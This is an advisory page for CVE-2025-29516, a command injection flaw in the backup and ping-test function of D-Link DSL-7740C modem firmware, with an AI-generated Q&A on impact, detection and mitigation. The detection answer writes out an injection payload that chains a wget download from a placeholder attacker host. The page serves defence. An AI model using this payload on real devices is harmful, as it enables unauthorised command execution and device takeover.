CVE-2025-29516
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-08-25

Last updated on: 2025-09-02

Assigner: MITRE

Description
D-Link DSL-7740C with firmware DSL7740C.V6.TR069.20211230 was discovered to contain a command injection vulnerability via the backup function.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-08-25
Last Modified
2025-09-02
Generated
2026-05-07
AI Q&A
2025-08-25
EPSS Evaluated
2026-05-05
NVD
Affected Vendors & Products
Showing 2 associated CPEs
Vendor Product Version / Range
dlink dsl-7740c_firmware 6.tr069.20211230
dlink dsl-7740c *
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2025-29516 is a critical command injection vulnerability in the D-Link DSL-7740C modem firmware version DSL7740C.V6.TR069.20211230. It affects the backup function accessed via the device's configuration menu. An attacker with administrative credentials can remotely inject malicious commands through the ping test's destination input, allowing arbitrary command execution with elevated privileges on the device. [1]


How can this vulnerability impact me? :

This vulnerability can lead to complete device compromise, allowing an attacker to bypass security controls, execute arbitrary commands, and gain full control over the device. The attacker can disrupt services, alter device configurations without authorization, intercept or manipulate network traffic, and potentially breach the network perimeter. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by attempting to inject commands via the backup function's ping test destination input on the D-Link DSL-7740C device. For example, an administrator can test by inputting a payload such as `1 || wget http://ATTACKER_HOST/test_bk -O /tmp/test_bk #` in the backup function's ping test destination field to see if arbitrary commands are executed. Monitoring SSH and Telnet interfaces for unusual command executions or unexpected network traffic related to wget or similar commands may also help detect exploitation attempts. [1]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting administrative access to the device's SSH and Telnet interfaces, disabling the backup function if possible, and monitoring for suspicious activity related to command injection attempts. Applying any available firmware updates or patches from D-Link addressing this vulnerability is critical once released. Additionally, ensure that only trusted administrators have access to the device to reduce the risk of exploitation. [1]


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart